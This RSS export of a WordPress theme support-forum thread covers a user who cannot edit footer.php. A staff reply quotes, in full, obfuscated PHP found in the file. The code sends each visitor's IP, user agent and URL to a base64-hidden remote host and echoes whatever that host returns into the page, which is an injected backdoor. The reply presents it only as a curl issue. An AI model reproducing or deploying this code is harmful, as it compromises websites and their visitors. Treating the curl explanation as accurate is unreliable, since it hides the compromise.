<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="bbPress/1.0.2" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>Support Forum - Topic: HELP WITH FOOTER.PHP- Still unable to edit and need help to resolve issue.</title>
		<link>http://www.kriesi.at/support/topic/help-with-footerphp-still-unable-to-edit-and-need-help-to-resolve-issue</link>
		<description>Support Forum - Topic: HELP WITH FOOTER.PHP- Still unable to edit and need help to resolve issue.</description>
		<language>en-US</language>
		<pubDate>Tue, 18 Jun 2013 23:11:16 +0000</pubDate>
		<generator>http://bbpress.org/?v=1.0.2</generator>
		<textInput>
			<title><![CDATA[Search]]></title>
			<description><![CDATA[Search all topics from these forums.]]></description>
			<name>q</name>
			<link>http://www.kriesi.at/support/search.php</link>
		</textInput>
		<atom:link href="http://www.kriesi.at/support/rss/topic/help-with-footerphp-still-unable-to-edit-and-need-help-to-resolve-issue" rel="self" type="application/rss+xml" />

		<item>
			<title>Dude on "HELP WITH FOOTER.PHP- Still unable to edit and need help to resolve issue."</title>
			<link>http://www.kriesi.at/support/topic/help-with-footerphp-still-unable-to-edit-and-need-help-to-resolve-issue#post-77710</link>
			<pubDate>Fri, 28 Sep 2012 06:14:48 +0000</pubDate>
			<dc:creator>Dude</dc:creator>
			<guid isPermaLink="false">77710@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;The code seems to be correct - however try to remove following code from footer.php:&#60;/p&#62;
&#60;pre&#62;&#60;code&#62;&#38;lt;?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER[&#38;#39;HTTP_USER_AGENT&#38;#39;]); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = &#38;quot;&#38;quot;;
    if((strstr($sUserAgent, &#38;#39;google&#38;#39;) == false)&#38;amp;&#38;amp;(strstr($sUserAgent, &#38;#39;yahoo&#38;#39;) == false)&#38;amp;&#38;amp;(strstr($sUserAgent, &#38;#39;baidu&#38;#39;) == false)&#38;amp;&#38;amp;(strstr($sUserAgent, &#38;#39;msn&#38;#39;) == false)&#38;amp;&#38;amp;(strstr($sUserAgent, &#38;#39;opera&#38;#39;) == false)&#38;amp;&#38;amp;(strstr($sUserAgent, &#38;#39;chrome&#38;#39;) == false)&#38;amp;&#38;amp;(strstr($sUserAgent, &#38;#39;bing&#38;#39;) == false)&#38;amp;&#38;amp;(strstr($sUserAgent, &#38;#39;safari&#38;#39;) == false)&#38;amp;&#38;amp;(strstr($sUserAgent, &#38;#39;bot&#38;#39;) == false)) // Bot comes
    {
        if(isset($_SERVER[&#38;#39;REMOTE_ADDR&#38;#39;]) == true &#38;amp;&#38;amp; isset($_SERVER[&#38;#39;HTTP_HOST&#38;#39;]) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( &#38;#39;aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=&#38;#39;).&#38;#39;?ip=&#38;#39;.urlencode($_SERVER[&#38;#39;REMOTE_ADDR&#38;#39;]).&#38;#39;&#38;amp;useragent=&#38;#39;.urlencode($sUserAgent).&#38;#39;&#38;amp;domainname=&#38;#39;.urlencode($_SERVER[&#38;#39;HTTP_HOST&#38;#39;]).&#38;#39;&#38;amp;fullpath=&#38;#39;.urlencode($_SERVER[&#38;#39;REQUEST_URI&#38;#39;]).&#38;#39;&#38;amp;check=&#38;#39;.isset($_GET[&#38;#39;look&#38;#39;]);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]==&#38;quot;O&#38;quot;)
     {$sResult[0]=&#38;quot; &#38;quot;;
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?&#38;gt;&#60;/code&#62;&#60;/pre&#62;
&#60;p&#62;If this solves the issue your hoster doesn't support curl. In this case you need to ask them how to activate curl support for php.
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Devin on "HELP WITH FOOTER.PHP- Still unable to edit and need help to resolve issue."</title>
			<link>http://www.kriesi.at/support/topic/help-with-footerphp-still-unable-to-edit-and-need-help-to-resolve-issue#post-77603</link>
			<pubDate>Thu, 27 Sep 2012 15:06:33 +0000</pubDate>
			<dc:creator>Devin</dc:creator>
			<guid isPermaLink="false">77603@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;I've tagged Dude on the topic so he can clone your footer's git and take a look.&#60;/p&#62;
&#60;p&#62;Regards,&#60;/p&#62;
&#60;p&#62;Devin
&#60;/p&#62;</description>
		</item>
		<item>
			<title>vsit on "HELP WITH FOOTER.PHP- Still unable to edit and need help to resolve issue."</title>
			<link>http://www.kriesi.at/support/topic/help-with-footerphp-still-unable-to-edit-and-need-help-to-resolve-issue#post-77406</link>
			<pubDate>Wed, 26 Sep 2012 08:15:24 +0000</pubDate>
			<dc:creator>vsit</dc:creator>
			<guid isPermaLink="false">77406@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Hi Dude,&#60;/p&#62;
&#60;p&#62;Sorry i am not too familiar with valid syntax, but i posted the information on the link you provided. &#60;/p&#62;
&#60;p&#62;About the github, i am not sure if i am doing this correctly but is this link the information i should provide to you after i uploaded it?&#60;/p&#62;
&#60;p&#62;Public Clone URL: 	git://gist.github.com/3786727.git&#60;br /&#62;
Private Clone URL: 	&#60;a href=&#34;mailto:git@gist.github.com&#34;&#62;git@gist.github.com&#60;/a&#62;:3786727.git&#60;/p&#62;
&#60;p&#62;If not please let me know so i can provide the correct information.&#60;/p&#62;
&#60;p&#62;Thank you
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Dude on "HELP WITH FOOTER.PHP- Still unable to edit and need help to resolve issue."</title>
			<link>http://www.kriesi.at/support/topic/help-with-footerphp-still-unable-to-edit-and-need-help-to-resolve-issue#post-77392</link>
			<pubDate>Wed, 26 Sep 2012 06:38:23 +0000</pubDate>
			<dc:creator>Dude</dc:creator>
			<guid isPermaLink="false">77392@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Did you check your code in footer.php (valid syntax, etc.)? If you're not sure regarding syntax errors please post your custom code by using &#60;a href=&#34;https://gist.github.com/&#34; rel=&#34;nofollow&#34;&#62;https://gist.github.com/&#60;/a&#62; and we'll check it for you.
&#60;/p&#62;</description>
		</item>
		<item>
			<title>vsit on "HELP WITH FOOTER.PHP- Still unable to edit and need help to resolve issue."</title>
			<link>http://www.kriesi.at/support/topic/help-with-footerphp-still-unable-to-edit-and-need-help-to-resolve-issue#post-77368</link>
			<pubDate>Wed, 26 Sep 2012 03:05:42 +0000</pubDate>
			<dc:creator>vsit</dc:creator>
			<guid isPermaLink="false">77368@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Hi Maya, &#60;/p&#62;
&#60;p&#62;I contacted my web hosting company, and they said that they could not find anything at all that could be causing this problem. I can't do any sort of editing in the footer.php whatsoever. &#60;/p&#62;
&#60;p&#62;Could it have to do with a plugin? Any other ideas or suggestions that could help fix this problem?&#60;/p&#62;
&#60;p&#62;I just don't want the links to show up with the old url address, however right now the footer all displays the old url. &#60;/p&#62;
&#60;p&#62;Please help.
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Mya on "HELP WITH FOOTER.PHP- Still unable to edit and need help to resolve issue."</title>
			<link>http://www.kriesi.at/support/topic/help-with-footerphp-still-unable-to-edit-and-need-help-to-resolve-issue#post-77132</link>
			<pubDate>Mon, 24 Sep 2012 16:05:59 +0000</pubDate>
			<dc:creator>Mya</dc:creator>
			<guid isPermaLink="false">77132@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Hi vsit,&#60;/p&#62;
&#60;p&#62;The error you're referring to is related to your web host. Have you checked with them? Sounds like they are experiencing issues with downtime.&#60;/p&#62;
&#60;p&#62;Regards,&#60;br /&#62;
Mya
&#60;/p&#62;</description>
		</item>
		<item>
			<title>vsit on "HELP WITH FOOTER.PHP- Still unable to edit and need help to resolve issue."</title>
			<link>http://www.kriesi.at/support/topic/help-with-footerphp-still-unable-to-edit-and-need-help-to-resolve-issue#post-77080</link>
			<pubDate>Mon, 24 Sep 2012 09:22:24 +0000</pubDate>
			<dc:creator>vsit</dc:creator>
			<guid isPermaLink="false">77080@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Hi,&#60;/p&#62;
&#60;p&#62;I am posting up another thread as i am still experiencing problems with editing the footer in the php file. I can't add any new links, edit any links, and i even tried to delete all three links in the footer section, but after every attempt the same message keeps coming up stating &#34;Service Temporarily Unavailable. The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later&#34;&#60;/p&#62;
&#60;p&#62;Can someone please help??&#60;/p&#62;
&#60;p&#62;url &#60;a href=&#34;http://www.poss.asia&#34; rel=&#34;nofollow&#34;&#62;http://www.poss.asia&#60;/a&#62;
&#60;/p&#62;</description>
		</item>

	</channel>
</rss>
